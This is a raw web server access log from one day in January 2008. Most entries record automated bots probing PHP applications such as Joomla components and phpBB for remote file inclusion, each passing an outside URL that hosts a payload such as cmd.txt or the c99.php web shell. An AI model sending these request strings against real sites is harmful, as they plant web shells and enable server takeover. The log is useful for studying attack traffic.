212.72.184.250 - - [31/Jan/2008:08:50:30 -0800] "GET //ws/login.php?noSet=0&includedir=http://www.zyssetd.ch/.../test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
67.18.136.2 - - [31/Jan/2008:08:50:36 -0800] "GET /logs/access_071202.log//path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.136.2 - - [31/Jan/2008:08:50:37 -0800] "GET //path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.136.2 - - [31/Jan/2008:08:50:37 -0800] "GET /logs//path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.141.110 - - [31/Jan/2008:08:50:47 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://4saltwater.com/templates_c/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.61.165.105 - - [31/Jan/2008:08:51:37 -0800] "GET /logs/access_080106.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.61.165.105 - - [31/Jan/2008:08:51:43 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.61.165.105 - - [31/Jan/2008:08:51:44 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
67.18.136.2 - - [31/Jan/2008:08:52:46 -0800] "GET /logs/access_071219.log//path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.105.25 - - [31/Jan/2008:08:52:48 -0800] "GET /index.php?subpage=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [31/Jan/2008:08:52:49 -0800] "GET /index.php?subpage=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.139.98 - - [31/Jan/2008:08:52:56 -0800] "GET /logs/access_080101.log/akocomments.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.93.255.93 - - [31/Jan/2008:08:53:18 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
201.91.155.2 - - [31/Jan/2008:08:53:25 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.th1nk3r.kit.net/cmd/c99.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.93 - - [31/Jan/2008:08:54:06 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.93.255.93 - - [31/Jan/2008:08:54:07 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.135.207.90 - - [31/Jan/2008:08:56:01 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.iasct.jp/image/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.135.207.90 - - [31/Jan/2008:08:56:01 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.iasct.jp/image/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.67.221.26 - - [31/Jan/2008:08:57:28 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.221.26 - - [31/Jan/2008:08:57:28 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.221.26 - - [31/Jan/2008:08:57:28 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:09:01:03 -0800] "GET /logs/access_071230.log/phpbb_root_path=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:09:01:04 -0800] "GET /phpbb_root_path=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:09:01:04 -0800] "GET /logs/phpbb_root_path=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.23.231 - - [31/Jan/2008:09:02:06 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.135.207.90 - - [31/Jan/2008:09:02:57 -0800] "GET /logs/access_071229.log/!scanhttp://www.iasct.jp/image/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.135.207.90 - - [31/Jan/2008:09:02:58 -0800] "GET /logs/!scanhttp://www.iasct.jp/image/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.93.255.93 - - [31/Jan/2008:09:03:25 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:09:06:09 -0800] "GET /logs/access_071225.log/phpbb_root_path=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:09:09:28 -0800] "GET /logs/access_071225.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.70.58 - - [31/Jan/2008:09:10:07 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.116.188.138 - - [31/Jan/2008:09:10:18 -0800] "GET /s.php?table=http://jabujabujabu.angelfire.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.13.250.115 - - [31/Jan/2008:09:10:18 -0800] "GET /logs/access_080101.log/index.php?redir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [31/Jan/2008:09:10:18 -0800] "GET /index.php?redir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [31/Jan/2008:09:10:18 -0800] "GET /logs/index.php?redir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.202.20 - - [31/Jan/2008:09:10:19 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
72.47.202.20 - - [31/Jan/2008:09:10:19 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.230.7.104 - - [31/Jan/2008:09:10:29 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://wiki.sertes.nl/tiki/styles/slides/index.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.24.203 - - [31/Jan/2008:09:10:34 -0800] "GET /megumi/?D=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.230.7.104 - - [31/Jan/2008:09:10:43 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://wiki.sertes.nl/tiki/styles/slides/index.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.104 - - [31/Jan/2008:09:10:46 -0800] "GET /logs/access_080103.log//modules/Neos_Chronos/header.php?base_folder=http://wiki.sertes.nl/tiki/styles/slides/index.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.104 - - [31/Jan/2008:09:10:52 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://wiki.sertes.nl/tiki/styles/slides/index.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.13.250.115 - - [31/Jan/2008:09:11:14 -0800] "GET /logs/access_080106.log/index.php?redir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
199.216.35.5 - - [31/Jan/2008:09:15:59 -0800] "GET /tools/send_reminders.php?noSet=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.106.58 - - [31/Jan/2008:09:16:06 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.106.58 - - [31/Jan/2008:09:16:06 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
199.216.35.5 - - [31/Jan/2008:09:16:37 -0800] "GET /tools/send_reminders.php?noSet=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.136.2 - - [31/Jan/2008:09:20:32 -0800] "GET /index.php?redir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.70.58 - - [31/Jan/2008:09:20:44 -0800] "GET /logs/access_071121.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.70.58 - - [31/Jan/2008:09:20:44 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.70.58 - - [31/Jan/2008:09:20:47 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.234 - - [31/Jan/2008:09:21:49 -0800] "GET /logs/access_070802.log HTTP/1.0" 200 35303 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.169.184.251 - - [31/Jan/2008:09:23:47 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.184.251 - - [31/Jan/2008:09:23:48 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.184.251 - - [31/Jan/2008:09:23:48 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.184.251 - - [31/Jan/2008:09:23:54 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
209.67.221.26 - - [31/Jan/2008:09:25:16 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.221.26 - - [31/Jan/2008:09:25:16 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.221.26 - - [31/Jan/2008:09:25:16 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.221.26 - - [31/Jan/2008:09:26:14 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.72.151 - - [31/Jan/2008:09:28:59 -0800] "GET /logs/access_071230.log//components/com_articles.php?absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.72.151 - - [31/Jan/2008:09:29:00 -0800] "GET //components/com_articles.php?absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.72.151 - - [31/Jan/2008:09:29:00 -0800] "GET /logs//components/com_articles.php?absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.144.55.219 - - [31/Jan/2008:09:29:30 -0800] "GET /logs/access_080103.log//////////index.php?_REQUEST=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [31/Jan/2008:09:29:30 -0800] "GET //////////index.php?_REQUEST=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [31/Jan/2008:09:29:31 -0800] "GET /logs//////////index.php?_REQUEST=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.136.201 - - [31/Jan/2008:09:34:36 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://karavell.com/cmd???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [31/Jan/2008:09:38:47 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [31/Jan/2008:09:38:48 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [31/Jan/2008:09:38:48 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.222 - - [31/Jan/2008:09:39:13 -0800] "GET /bikes/GPS/WeSTOC2006/?N=D HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.72.161.50 - - [31/Jan/2008:09:39:36 -0800] "GET /index.php?redir=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.255.2.130 - - [31/Jan/2008:09:39:42 -0800] "GET /logs/access_071220.log HTTP/1.1" 200 140699 "-" "biir0nsbm ptkitvneylkvh" "www.dmulk.com"
67.18.136.2 - - [31/Jan/2008:09:39:50 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.136.201 - - [31/Jan/2008:09:40:57 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://karavell.com/cmd???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.136.201 - - [31/Jan/2008:09:40:58 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://karavell.com/cmd???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.130.161.209 - - [31/Jan/2008:09:40:59 -0800] "GET /index.php?redir=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.34 - - [31/Jan/2008:09:42:03 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.34 - - [31/Jan/2008:09:42:03 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.34 - - [31/Jan/2008:09:42:03 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.202.20 - - [31/Jan/2008:09:42:08 -0800] "GET //becommunity/community/index.php?pageurl=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
72.47.202.20 - - [31/Jan/2008:09:42:09 -0800] "GET /logs//becommunity/community/index.php?pageurl=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
82.135.207.90 - - [31/Jan/2008:09:42:18 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.iasct.jp/image/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.19.160 - - [31/Jan/2008:09:42:37 -0800] "GET /bikes/GPS/WeSTOC2006/?N=A HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.91.155.2 - - [31/Jan/2008:09:43:25 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.th1nk3r.kit.net/cmd/c99.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.91.155.2 - - [31/Jan/2008:09:43:26 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.th1nk3r.kit.net/cmd/c99.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.157.58.25 - - [31/Jan/2008:09:43:36 -0800] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
207.157.58.25 - - [31/Jan/2008:09:43:40 -0800] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
193.34.68.128 - - [31/Jan/2008:09:44:58 -0800] "GET /logs//?mosConfig_absolute_path=http://www.ceia.uchile.cl/cache/mic2.txt?? HTTP/1.1" 200 33218 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
193.34.68.128 - - [31/Jan/2008:09:44:58 -0800] "GET //?mosConfig_absolute_path=http://www.ceia.uchile.cl/cache/mic2.txt?? HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
85.10.136.201 - - [31/Jan/2008:09:46:13 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://karavell.com/cmd???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.100.220.34 - - [31/Jan/2008:09:47:18 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.34 - - [31/Jan/2008:09:47:18 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.34 - - [31/Jan/2008:09:47:19 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.34 - - [31/Jan/2008:09:47:19 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.34 - - [31/Jan/2008:09:47:20 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.34 - - [31/Jan/2008:09:47:20 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.34 - - [31/Jan/2008:09:47:36 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.34 - - [31/Jan/2008:09:47:37 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.34 - - [31/Jan/2008:09:47:37 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.34 - - [31/Jan/2008:09:48:25 -0800] "GET /tmp/?S=A HTTP/1.0" 200 815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.243.54.131 - - [31/Jan/2008:09:49:15 -0800] "GET /config.php?path_to_root=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
87.106.18.175 - - [31/Jan/2008:09:49:34 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.25.2 - - [31/Jan/2008:09:50:27 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.25.2 - - [31/Jan/2008:09:50:28 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.25.2 - - [31/Jan/2008:09:50:28 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.9.75.244 - - [31/Jan/2008:09:51:01 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.withoutguile.net/wp-includes/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
